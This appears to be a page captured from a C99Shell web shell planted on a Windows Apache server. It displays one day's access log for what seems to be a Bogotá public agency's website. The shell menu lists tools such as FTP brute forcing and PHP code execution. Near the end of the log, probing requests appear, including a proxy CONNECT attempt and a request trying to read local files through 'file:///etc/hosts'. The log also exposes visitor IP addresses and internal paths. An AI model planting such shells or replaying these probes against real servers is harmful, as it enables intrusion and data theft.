!C99Shell v. 1.0 pre-release build #13!

Software: Apache. PHP/5.5.15 

uname -a: Windows NT SVR-DMZ 6.1 build 7600 (Windows Server 2008 R2 Enterprise Edition) i586 

SYSTEM 

Safe-mode: OFF (not secure)

E:\nuevo\apache\logs\   drwxrwxrwx
Free 5.02 GB of 239.26 GB (2.1%)
Detected drives: [ a ] [ c ] [ d ] [ e ] [ f ]
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     access.2022.02.14.log (4.41 MB)      -rw-rw-rw-
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
190.84.108.224 - - [14/Feb/2022:00:01:50 -0500] "GET /appsia/controlador HTTP/1.1" 200 4799
190.84.108.224 - - [14/Feb/2022:00:01:50 -0500] "GET /appsia/scripts/validarIngreso.js HTTP/1.1" 200 851
190.84.108.224 - - [14/Feb/2022:00:01:50 -0500] "GET /appsia/css/estilos.css HTTP/1.1" 200 4804
190.84.108.224 - - [14/Feb/2022:00:01:51 -0500] "GET /appsia/images/logo_bogota_p.png HTTP/1.1" 200 14951
190.84.108.224 - - [14/Feb/2022:00:01:51 -0500] "GET /appsia/images/cabezoteHojaVida.png HTTP/1.1" 200 32493
190.84.108.224 - - [14/Feb/2022:00:01:51 -0500] "GET /favicon.ico HTTP/1.1" 200 7782
114.119.141.53 - - [14/Feb/2022:00:01:59 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202010/4785.pdf HTTP/1.1" 200 692254
190.84.108.224 - - [14/Feb/2022:00:02:03 -0500] "POST /appsia/controlador HTTP/1.1" 200 4621
191.102.224.199 - - [14/Feb/2022:00:02:04 -0500] "GET /appsia/controlador HTTP/1.1" 200 4799
191.102.224.199 - - [14/Feb/2022:00:02:05 -0500] "GET /appsia/css/estilos.css HTTP/1.1" 200 4804
191.102.224.199 - - [14/Feb/2022:00:02:05 -0500] "GET /appsia/scripts/validarIngreso.js HTTP/1.1" 200 851
191.102.224.199 - - [14/Feb/2022:00:02:05 -0500] "GET /appsia/images/cabezoteHojaVida.png HTTP/1.1" 200 32493
191.102.224.199 - - [14/Feb/2022:00:02:06 -0500] "GET /appsia/images/logo_bogota_p.png HTTP/1.1" 200 14951
190.84.108.224 - - [14/Feb/2022:00:02:07 -0500] "POST /appsia/controlador HTTP/1.1" 200 9156
190.84.108.224 - - [14/Feb/2022:00:02:07 -0500] "GET /appsia/images/logo_escudo.png HTTP/1.1" 200 36965
190.84.108.224 - - [14/Feb/2022:00:02:19 -0500] "POST /appsia/controlador HTTP/1.1" 200 4621
216.245.221.92 - - [14/Feb/2022:00:02:20 -0500] "HEAD / HTTP/1.1" 200 -
190.84.108.224 - - [14/Feb/2022:00:02:21 -0500] "POST /appsia/controlador HTTP/1.1" 200 4799
66.249.79.5 - - [14/Feb/2022:00:02:22 -0500] "-" 408 -
201.245.192.253 - - [14/Feb/2022:00:02:05 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 121004
207.46.13.106 - - [14/Feb/2022:00:03:40 -0500] "GET /bla/resoluciones/notificaciones/autos%202013/3191.doc HTTP/1.1" 200 228864
114.119.132.76 - - [14/Feb/2022:00:03:44 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202010/RESOLUCION%203650%20DE%202010.PDF HTTP/1.1" 200 19917
181.53.13.175 - - [14/Feb/2022:00:05:22 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultarSolicitudProceso.xhtml HTTP/1.1" 200 34646
181.53.13.175 - - [14/Feb/2022:00:05:23 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
181.53.13.175 - - [14/Feb/2022:00:05:23 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.53.13.175 - - [14/Feb/2022:00:05:23 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.53.13.175 - - [14/Feb/2022:00:05:23 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.53.13.175 - - [14/Feb/2022:00:05:23 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.53.13.175 - - [14/Feb/2022:00:05:24 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.53.13.175 - - [14/Feb/2022:00:05:24 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.53.13.175 - - [14/Feb/2022:00:05:25 -0500] "GET /sipse/css/imagen/contrasena.png HTTP/1.1" 404 383
181.53.13.175 - - [14/Feb/2022:00:05:25 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 28019
181.53.13.175 - - [14/Feb/2022:00:05:25 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 28019
181.53.13.175 - - [14/Feb/2022:00:05:26 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 28019
181.53.13.175 - - [14/Feb/2022:00:05:26 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 1344
181.53.13.175 - - [14/Feb/2022:00:05:28 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 1344
181.53.13.175 - - [14/Feb/2022:00:05:29 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 1344
181.53.13.175 - - [14/Feb/2022:00:05:30 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 1344
181.53.13.175 - - [14/Feb/2022:00:05:54 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 34761
181.53.13.175 - - [14/Feb/2022:00:05:56 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 34671
181.53.13.175 - - [14/Feb/2022:00:06:01 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 113696
181.53.13.175 - - [14/Feb/2022:00:06:03 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
181.53.13.175 - - [14/Feb/2022:00:06:03 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.53.13.175 - - [14/Feb/2022:00:06:03 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.53.13.175 - - [14/Feb/2022:00:06:03 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.53.13.175 - - [14/Feb/2022:00:06:03 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.53.13.175 - - [14/Feb/2022:00:06:03 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.53.13.175 - - [14/Feb/2022:00:06:03 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.53.13.175 - - [14/Feb/2022:00:06:04 -0500] "GET /sipse/css/imagen/contrasena.png HTTP/1.1" 404 383
181.53.13.175 - - [14/Feb/2022:00:06:04 -0500] "GET /reportes_sipse/sdg/ServletReporte?reporte=experienia_idoneidad&solicitud=16095&pfdrid_c=false HTTP/1.1" 200 125637
181.53.13.175 - - [14/Feb/2022:00:06:17 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultarSolicitudProceso.xhtml HTTP/1.1" 200 21131
181.53.13.175 - - [14/Feb/2022:00:06:19 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
181.53.13.175 - - [14/Feb/2022:00:06:19 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.53.13.175 - - [14/Feb/2022:00:06:19 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.53.13.175 - - [14/Feb/2022:00:06:19 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.53.13.175 - - [14/Feb/2022:00:06:19 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.53.13.175 - - [14/Feb/2022:00:06:19 -0500] "GET /sipse/faces/javax.faces.resource/fileupload/fileupload.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.53.13.175 - - [14/Feb/2022:00:06:19 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.53.13.175 - - [14/Feb/2022:00:06:19 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.53.13.175 - - [14/Feb/2022:00:06:19 -0500] "GET /sipse/faces/javax.faces.resource/fileupload/fileupload.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.53.13.175 - - [14/Feb/2022:00:06:19 -0500] "GET /sipse/css/imagen/contrasena.png HTTP/1.1" 404 383
181.53.13.175 - - [14/Feb/2022:00:06:36 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
181.53.13.175 - - [14/Feb/2022:00:06:36 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.53.13.175 - - [14/Feb/2022:00:06:36 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.53.13.175 - - [14/Feb/2022:00:06:36 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.53.13.175 - - [14/Feb/2022:00:06:36 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.53.13.175 - - [14/Feb/2022:00:06:36 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.53.13.175 - - [14/Feb/2022:00:06:36 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.53.13.175 - - [14/Feb/2022:00:06:35 -0500] "POST /sipse/faces/presentacion/sistema/anexos/cargarAnexoSolicitudProceso.xhtml HTTP/1.1" 200 159633
181.53.13.175 - - [14/Feb/2022:00:06:36 -0500] "GET /sipse/css/imagen/contrasena.png HTTP/1.1" 404 383
181.53.13.175 - - [14/Feb/2022:00:06:36 -0500] "GET /reportes_sipse/sdg/ServletReporte?reporte=experienia_idoneidad&solicitud=16095&pfdrid_c=false HTTP/1.1" 200 125637
2.58.149.136 - - [14/Feb/2022:00:07:02 -0500] "GET / HTTP/1.1" 200 319
216.245.221.92 - - [14/Feb/2022:00:07:20 -0500] "HEAD / HTTP/1.1" 200 -
190.203.189.176 - - [14/Feb/2022:00:08:10 -0500] "GET /galeria/galeria/jquery.fancybox.css?v=2.1.5 HTTP/1.1" 200 4895
186.80.52.95 - - [14/Feb/2022:00:09:49 -0500] "GET /galeria/galeria/jquery.fancybox.css?v=2.1.5 HTTP/1.1" 200 4895
157.55.39.87 - - [14/Feb/2022:00:11:26 -0500] "GET /BLA/resoluciones/Notificaciones/AUTOS%202017/3974.pdf HTTP/1.1" 304 -
114.119.141.42 - - [14/Feb/2022:00:11:29 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202010/2329.pdf HTTP/1.1" 200 532705
157.55.39.84 - - [14/Feb/2022:00:11:31 -0500] "GET /bla/resoluciones/notificaciones/autos%202013/3332.doc HTTP/1.1" 200 227840
186.119.88.213 - - [14/Feb/2022:00:11:59 -0500] "GET /galeria/galeria/jquery.fancybox.css?v=2.1.5 HTTP/1.1" 200 4895
201.245.192.253 - - [14/Feb/2022:00:11:18 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 121098
216.245.221.92 - - [14/Feb/2022:00:12:20 -0500] "HEAD / HTTP/1.1" 200 -
186.84.20.65 - - [14/Feb/2022:00:13:28 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultarSolicitudProceso.xhtml HTTP/1.1" 200 42098
186.84.20.65 - - [14/Feb/2022:00:13:28 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
186.84.20.65 - - [14/Feb/2022:00:13:28 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.84.20.65 - - [14/Feb/2022:00:13:28 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.84.20.65 - - [14/Feb/2022:00:13:28 -0500] "GET /sipse/css/imagen/contrasena.png HTTP/1.1" 404 383
186.84.20.65 - - [14/Feb/2022:00:13:28 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.84.20.65 - - [14/Feb/2022:00:13:28 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.84.20.65 - - [14/Feb/2022:00:13:28 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.84.20.65 - - [14/Feb/2022:00:13:28 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.84.20.65 - - [14/Feb/2022:00:13:29 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultar.xhtml HTTP/1.1" 200 35508
186.84.20.65 - - [14/Feb/2022:00:13:29 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultar.xhtml HTTP/1.1" 200 35508
114.119.141.73 - - [14/Feb/2022:00:13:38 -0500] "GET /BLA/resoluciones/index.php?dir&sort=name&order=asc HTTP/1.1" 200 13093
186.84.20.65 - - [14/Feb/2022:00:13:48 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultar.xhtml HTTP/1.1" 200 12870
186.84.20.65 - - [14/Feb/2022:00:13:52 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultar.xhtml HTTP/1.1" 200 143719
186.84.20.65 - - [14/Feb/2022:00:13:54 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
186.84.20.65 - - [14/Feb/2022:00:13:54 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.84.20.65 - - [14/Feb/2022:00:13:54 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.84.20.65 - - [14/Feb/2022:00:13:54 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.84.20.65 - - [14/Feb/2022:00:13:54 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.84.20.65 - - [14/Feb/2022:00:13:54 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.84.20.65 - - [14/Feb/2022:00:13:54 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.84.20.65 - - [14/Feb/2022:00:13:54 -0500] "GET /sipse/css/imagen/contrasena.png HTTP/1.1" 404 383
186.84.20.65 - - [14/Feb/2022:00:13:54 -0500] "GET /reportes_sipse/sdg/ServletReporte?reporte=experienia_idoneidad&solicitud=16095&pfdrid_c=false HTTP/1.1" 200 125637
186.84.20.65 - - [14/Feb/2022:00:15:15 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultarSolicitudProceso.xhtml HTTP/1.1" 200 5504
186.84.20.65 - - [14/Feb/2022:00:15:16 -0500] "GET /reportes_sipse/sdg/ServletReporte?reporte=experienia_idoneidad&solicitud=16172&pfdrid_c=false HTTP/1.1" 200 122435
114.119.141.73 - - [14/Feb/2022:00:15:28 -0500] "GET /BLA/resoluciones/AUTOS%202015/3092.pdf HTTP/1.1" 200 538642
190.102.124.1 - - [14/Feb/2022:00:16:17 -0500] "GET /catalogoisis/ HTTP/1.1" 404 211
190.102.124.1 - - [14/Feb/2022:00:16:17 -0500] "GET /favicon.ico HTTP/1.1" 200 7782
190.102.124.1 - - [14/Feb/2022:00:16:18 -0500] "GET /catalogoisis/ HTTP/1.1" 404 211
190.102.124.1 - - [14/Feb/2022:00:16:21 -0500] "GET /catalogoisis/ HTTP/1.1" 404 211
216.245.221.92 - - [14/Feb/2022:00:17:20 -0500] "HEAD / HTTP/1.1" 200 -
199.16.157.183 - - [14/Feb/2022:00:19:00 -0500] "GET /images/PIGA1.jpeg HTTP/1.1" 200 167676
190.236.75.94 - - [14/Feb/2022:00:19:24 -0500] "GET /galeria/galeria/jquery.fancybox.css?v=2.1.5 HTTP/1.1" 200 4895
69.171.251.21 - - [14/Feb/2022:00:19:35 -0500] "GET /images/carro-carga-movilidad-4-febrero.jpg HTTP/1.1" 200 46258
201.245.192.253 - - [14/Feb/2022:00:21:15 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 44213
201.245.192.253 - - [14/Feb/2022:00:21:24 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 121098
216.245.221.92 - - [14/Feb/2022:00:22:20 -0500] "HEAD / HTTP/1.1" 200 -
114.119.141.52 - - [14/Feb/2022:00:22:31 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202010/4314.pdf HTTP/1.1" 200 413505
201.245.192.253 - - [14/Feb/2022:00:22:02 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 47711
191.95.163.175 - - [14/Feb/2022:00:25:03 -0500] "GET /programa-mujeres-que-reverdecen-tiene-cerca-de-200-cupos-disponibles.html HTTP/1.1" 200 1059
114.119.141.42 - - [14/Feb/2022:00:25:40 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202011/2254.pdf HTTP/1.1" 200 388466
54.39.243.52 - - [14/Feb/2022:00:26:03 -0500] "GET /auambari-deleito-con-sus-sonidos-ambientales-a-los-asistentes-de-fima-2021.html HTTP/1.1" 200 888
157.55.39.84 - - [14/Feb/2022:00:26:43 -0500] "GET /Residuos/vehiculos/vehiculos.html HTTP/1.1" 304 -
216.245.221.92 - - [14/Feb/2022:00:27:20 -0500] "HEAD / HTTP/1.1" 200 -
34.147.82.235 - - [14/Feb/2022:00:28:54 -0500] "GET / HTTP/1.1" 200 319
40.77.167.10 - - [14/Feb/2022:00:29:42 -0500] "GET /afluentesyefuentes/files/mobile/index.html/javascript/book.js HTTP/1.1" 404 1018
114.119.141.52 - - [14/Feb/2022:00:30:01 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202015/1355.pdf HTTP/1.1" 200 662716
201.245.192.253 - - [14/Feb/2022:00:31:14 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 44213
216.245.221.92 - - [14/Feb/2022:00:32:20 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [14/Feb/2022:00:31:59 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 47711
201.245.192.253 - - [14/Feb/2022:00:32:38 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 121098
157.55.39.87 - - [14/Feb/2022:00:33:30 -0500] "GET /bla/resoluciones/notificaciones/autos%202013/1908.doc HTTP/1.1" 200 252416
207.46.13.15 - - [14/Feb/2022:00:33:38 -0500] "GET /bla/resoluciones/index.php?dir=notificaciones/registros+2014 HTTP/1.1" 200 15754
204.199.115.98 - - [14/Feb/2022:00:33:58 -0500] "GET /galeria/galeria/jquery.fancybox.css?v=2.1.5 HTTP/1.1" 200 4895
114.119.141.42 - - [14/Feb/2022:00:35:50 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202018/1386.pdf HTTP/1.1" 200 529332
207.46.13.99 - - [14/Feb/2022:00:36:48 -0500] "GET /bla/resoluciones/notificaciones/registros%202014/3004.doc HTTP/1.1" 200 199168
216.245.221.92 - - [14/Feb/2022:00:37:20 -0500] "HEAD / HTTP/1.1" 200 -
114.119.141.51 - - [14/Feb/2022:00:37:23 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202010/1907.pdf HTTP/1.1" 200 589326
190.38.33.240 - - [14/Feb/2022:00:40:17 -0500] "GET /galeria/galeria/jquery.fancybox.css?v=2.1.5 HTTP/1.1" 200 4895
114.119.141.42 - - [14/Feb/2022:00:41:19 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202016/1938.pdf HTTP/1.1" 200 640234
152.231.25.154 - - [14/Feb/2022:00:41:47 -0500] "GET /galeria/galeria/jquery.fancybox.css?v=2.1.5 HTTP/1.1" 200 4895
201.245.192.253 - - [14/Feb/2022:00:41:15 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 44213
201.245.192.253 - - [14/Feb/2022:00:41:31 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 121098
216.245.221.92 - - [14/Feb/2022:00:42:20 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [14/Feb/2022:00:41:59 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 47711
114.119.141.73 - - [14/Feb/2022:00:43:04 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202010/1775.pdf HTTP/1.1" 200 566858
157.55.39.87 - - [14/Feb/2022:00:43:21 -0500] "GET /bla/resoluciones/notificaciones/autos%202013/02091.doc HTTP/1.1" 200 226816
207.46.13.99 - - [14/Feb/2022:00:43:29 -0500] "GET /bla/resoluciones/notificaciones/autos%202013/02241.doc HTTP/1.1" 200 856576
20.109.241.82 - - [14/Feb/2022:00:44:41 -0500] "GET /galeria/nivo-slider/demo/images/Bannerenvases.jpg HTTP/1.1" 200 37316
114.119.141.71 - - [14/Feb/2022:00:45:41 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202013/0911.pdf HTTP/1.1" 200 435809
216.245.221.92 - - [14/Feb/2022:00:47:20 -0500] "HEAD / HTTP/1.1" 200 -
114.119.141.52 - - [14/Feb/2022:00:47:39 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202010/3467.pdf HTTP/1.1" 200 516115
114.119.141.53 - - [14/Feb/2022:00:50:27 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202010/6218.pdf HTTP/1.1" 200 434940
88.198.46.5 - - [14/Feb/2022:00:51:06 -0500] "-" 408 -
201.245.192.253 - - [14/Feb/2022:00:51:31 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 121098
216.245.221.92 - - [14/Feb/2022:00:52:20 -0500] "HEAD / HTTP/1.1" 200 -
114.119.132.76 - - [14/Feb/2022:00:52:55 -0500] "GET /BLA/resoluciones/AUTOS%202018/1803.pdf HTTP/1.1" 200 277165
170.78.40.164 - - [14/Feb/2022:00:53:14 -0500] "GET /galeria/galeria/jquery.fancybox.css?v=2.1.5 HTTP/1.1" 200 4895
216.245.221.92 - - [14/Feb/2022:00:57:20 -0500] "HEAD / HTTP/1.1" 200 -
23.95.100.141 - - [14/Feb/2022:00:57:25 -0500] "HEAD / HTTP/1.0" 200 -
114.119.141.73 - - [14/Feb/2022:00:57:28 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202010/3946.pdf HTTP/1.1" 200 504246
114.119.141.52 - - [14/Feb/2022:00:59:50 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202010/7335.pdf HTTP/1.1" 200 520814
114.119.141.69 - - [14/Feb/2022:01:01:44 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202010/2873.pdf HTTP/1.1" 200 417292
69.63.189.15 - - [14/Feb/2022:01:02:02 -0500] "GET /images/grafica-calidad-aire-monitoreo-7-febrero.jpg HTTP/1.1" 200 108619
31.13.127.26 - - [14/Feb/2022:01:02:02 -0500] "GET /images/Martestarde1.jpeg HTTP/1.1" 200 124459
173.252.107.9 - - [14/Feb/2022:01:02:07 -0500] "GET /images/mujeres-reverdecen-humedales-2-febrero.jpg HTTP/1.1" 200 47327
173.252.107.19 - - [14/Feb/2022:01:02:07 -0500] "GET /images/incendios-forestales-amazonia-4-febrero.jpg HTTP/1.1" 200 22193
173.252.107.2 - - [14/Feb/2022:01:02:07 -0500] "GET /images/carro-carga-movilidad-4-febrero.jpg HTTP/1.1" 200 46258
69.63.189.4 - - [14/Feb/2022:01:02:12 -0500] "GET /images/Feria.jpeg HTTP/1.1" 200 78773
173.252.107.4 - - [14/Feb/2022:01:02:16 -0500] "GET /images/feria-servicios-enero-18.jpg HTTP/1.1" 200 51569
216.245.221.92 - - [14/Feb/2022:01:02:20 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [14/Feb/2022:01:01:46 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 121098
199.16.157.180 - - [14/Feb/2022:01:04:30 -0500] "-" 408 -
17.121.115.80 - - [14/Feb/2022:01:04:38 -0500] "-" 408 -
116.202.35.86 - - [14/Feb/2022:01:04:49 -0500] "-" 408 -
40.77.167.10 - - [14/Feb/2022:01:05:05 -0500] "GET /bla/resoluciones/notificaciones/autos%202013/3420.doc HTTP/1.1" 200 233472
66.249.79.217 - - [14/Feb/2022:01:05:15 -0500] "-" 408 -
40.77.167.10 - - [14/Feb/2022:01:05:35 -0500] "GET /bla/resoluciones/notificaciones/autos%202013/2074.doc HTTP/1.1" 200 237056
157.55.39.87 - - [14/Feb/2022:01:05:42 -0500] "GET /bla/resoluciones/notificaciones/autos%202013/3530.doc HTTP/1.1" 200 231936
213.186.1.249 - - [14/Feb/2022:01:06:05 -0500] "GET /programa-mujeres-que-reverdecen-tiene-cerca-de-200-cupos-disponibles.html HTTP/1.1" 200 1059
216.245.221.92 - - [14/Feb/2022:01:07:20 -0500] "HEAD / HTTP/1.1" 200 -
66.249.79.246 - - [14/Feb/2022:01:07:55 -0500] "-" 408 -
157.55.39.210 - - [14/Feb/2022:01:07:58 -0500] "-" 408 -
114.119.141.71 - - [14/Feb/2022:01:08:30 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202010/3682.pdf HTTP/1.1" 200 893366
114.119.141.42 - - [14/Feb/2022:01:10:03 -0500] "GET /BLA/resoluciones/AUTOS%202018/0071.pdf HTTP/1.1" 200 291945
152.61.192.232 - - [14/Feb/2022:01:10:46 -0500] "GET / HTTP/1.1" 200 319
114.119.141.69 - - [14/Feb/2022:01:11:48 -0500] "GET /BLA/resoluciones/AUTOS%202014/4190.pdf HTTP/1.1" 200 131447
201.245.192.253 - - [14/Feb/2022:01:11:29 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 120681
216.245.221.92 - - [14/Feb/2022:01:12:20 -0500] "HEAD / HTTP/1.1" 200 -
114.119.141.53 - - [14/Feb/2022:01:13:34 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202007/RES%202007%20301%20AL%20400/RESOLUCION%200360%20DE%202007.pdf HTTP/1.1" 200 462926
139.162.145.250 - - [14/Feb/2022:01:14:01 -0500] "\x16\x03\x01" 400 226
114.119.141.42 - - [14/Feb/2022:01:15:31 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202010/3029.pdf HTTP/1.1" 200 289965
216.245.221.92 - - [14/Feb/2022:01:17:20 -0500] "HEAD / HTTP/1.1" 200 -
114.119.141.42 - - [14/Feb/2022:01:17:22 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202010/1307.pdf HTTP/1.1" 200 112106
152.61.128.50 - - [14/Feb/2022:01:17:49 -0500] "GET / HTTP/1.1" 200 319
173.249.10.27 - - [14/Feb/2022:01:18:03 -0500] "HEAD / HTTP/1.1" 200 -
173.249.10.27 - - [14/Feb/2022:01:18:04 -0500] "GET / HTTP/1.1" 200 319
114.119.132.76 - - [14/Feb/2022:01:19:28 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202010/4233.pdf HTTP/1.1" 200 431447
143.198.136.88 - - [14/Feb/2022:01:20:42 -0500] "CONNECT leakix.net:443 HTTP/1.1" 405 938
143.198.136.88 - - [14/Feb/2022:01:20:43 -0500] "GET /favicon.ico HTTP/1.1" 200 7782
143.198.136.88 - - [14/Feb/2022:01:20:44 -0500] "GET /api/geojson?url=file:///etc/hosts HTTP/1.1" 404 1018
